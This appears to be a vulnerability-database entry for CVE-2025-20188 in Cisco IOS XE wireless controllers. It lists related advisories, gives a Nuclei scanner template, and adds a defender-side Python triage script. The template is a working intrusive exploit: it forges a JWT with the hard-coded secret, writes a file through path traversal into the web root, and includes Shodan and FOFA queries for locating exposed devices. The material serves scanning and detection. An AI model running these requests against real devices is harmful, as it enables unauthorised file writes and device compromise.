| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability of the access point loading function in Cisco IOS XE wireless local control devices allows an attacker to execute arbitrary commands. | 9 May 2025 00:00 | – | bdu_fstec |
| CVE-2025-20188 | 7 May 2025 18:41 | – | circl |
| Cisco IOS XE Wireless Controller Software Arbitrary File Upload Vulnerability | 7 May 2025 16:00 | – | cisco |
| Cisco IOS XE Wireless Controller Arbitrary File Upload (cisco-sa-wlc-file-uplpd-rHZG9UfC) | 15 May 2025 00:00 | – | nessus |
| Cisco IOS XE Trust Management Issue Vulnerability | 7 May 2025 00:00 | – | cnnvd |
| CVE-2025-20188 | 7 May 2025 17:34 | – | cve |
| CVE-2025-20188 | 7 May 2025 17:34 | – | cvelist |
| EUVD-2025-13907 | 3 Oct 2025 20:07 | – | euvd |
| Vulnerabilities fixed in Cisco IOS XE Software | 8 May 2025 08:43 | – | ncsc |
| CVE-2025-20188 | 7 May 2025 18:15 | – | nvd |

```yaml
id: CVE-2025-20188

info:
  name: Cisco IOS XE WLC - Arbitrary File Upload
  author: iamnoooob,pdresearch,DhiyaneshDK
  severity: critical
  description: |
    A vulnerability in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system. This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system. An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP image download interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.
  impact: |
    Unauthenticated attackers can exploit hard-coded JWT tokens to upload arbitrary files and execute commands with root privileges on Cisco IOS XE WLC devices, leading to complete device compromise and potential network-wide access.
  remediation: |
    Apply the patch provided in Cisco Security Advisory cisco-sa-wlc-file-uplpd-rHZG9UfC.
  reference:
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
    - https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-20188
    cwe-id: CWE-798
    epss-score: 0.17894
    epss-percentile: 0.96814
  metadata:
    verified: true
    max-request: 2
    fofa-query: '"IOS-Self-Signed-Certificate" && port="8443"'
    shodan-query: 'http.html_hash:1076109428 ssl.cert.issuer.cn:"IOS-Self-Signed-Certificate" port:8443'
  tags: cve,cve2025,cisco,file-upload,intrusive,rce,vkev,vuln

flow: |
  if (http(1)) {
    http(2) && http(3)
  }

variables:
  exp: "{{unix_time(10000)}}"
  secret: "notfound"
  payload: '{"reqid":"cdb_token_request_id1","exp":{{exp}}}'
  filename: "{{randbase(8)}}"
  path: "usr/binos/openresty/nginx/html/"
  string: "{{to_lower('{{randstr}}')}}"

http:
  - raw:
      - |
        POST /ap_spec_rec/upload/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: jwt={{randstr}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Accept-Encoding: gzip

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="../..{{path}}/{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 401"
          - "contains(body, 'invalid jwt string')"
        condition: and
        internal: true

  - raw:
      - |
        POST /ap_spec_rec/upload/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: jwt={{ generate_jwt(payload,"HS256",secret) }}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Accept-Encoding: gzip

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="../../{{path}}{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'openresty')"
        condition: and

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '{{string}}')"
        condition: and
# digest: 490a0046304402202902a123ef89e331c32e2a6c5ee9a97a838e4ff1b87543f70baa7906e9ad1e8b022029d911449cebd5a9e0ff06df4e7729157ac0f747e29c93758858e92d17be5cf6:922c64590222798bb761d5b6d8e72950
```
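
A defender-side triage of captured requests for the pattern this template sends, as an added example that is not part of the template or of Cisco's advisory: it flags requests to `/ap_spec_rec/upload/` whose `jwt` cookie verifies under the secret the template uses, or whose multipart `filename` contains a `..` segment. The request dict layout, the finding labels and the sample requests are assumptions constructed for illustration.

```python
import base64
import hashlib
import hmac
import re

# Both values come from the template above.
UPLOAD_PATH = "/ap_spec_rec/upload/"
TEMPLATE_SECRET = b"notfound"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _hs256(key: bytes, signing_input: str) -> str:
    return _b64url(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def signed_with_template_secret(token: str) -> bool:
    """True if the JWT's HS256 signature verifies under TEMPLATE_SECRET."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        return False
    expected = _hs256(TEMPLATE_SECRET, parts[0] + "." + parts[1])
    return hmac.compare_digest(expected.encode(), parts[2].rstrip("=").encode())


def triage(request: dict) -> list:
    """Findings for one captured request; the dict layout is hypothetical."""
    if not request["path"].startswith(UPLOAD_PATH):
        return []
    findings = []
    cookie = re.search(r"(?:^|;\s*)jwt=([^;\s]+)", request.get("cookie", ""))
    if cookie and signed_with_template_secret(cookie.group(1)):
        findings.append("jwt-signed-with-known-secret")
    names = re.findall(r'filename="([^"]*)"', request.get("body", ""))
    if any(".." in n.replace("\\", "/").split("/") for n in names):
        findings.append("upload-filename-traversal")
    return findings


# Constructed sample requests, not real traffic.
_JWT = _b64url(b'{"alg":"HS256","typ":"JWT"}') + "." + _b64url(b'{"reqid":"sample","exp":0}')
SAMPLES = [
    {"path": UPLOAD_PATH, "cookie": "jwt=%s.%s" % (_JWT, _hs256(TEMPLATE_SECRET, _JWT)),
     "body": 'Content-Disposition: form-data; name="file"; filename="../../tmp/x.txt"'},
    {"path": UPLOAD_PATH, "cookie": "jwt=%s.%s" % (_JWT, _hs256(b"other-key", _JWT)),
     "body": 'Content-Disposition: form-data; name="file"; filename="ap_image.bin"'},
    {"path": "/index.html", "cookie": "", "body": ""},
]
```

Either finding on its own is worth a look: a token that verifies under a publicly known secret should never reach the upload endpoint, and a legitimate AP image name has no `..` segment.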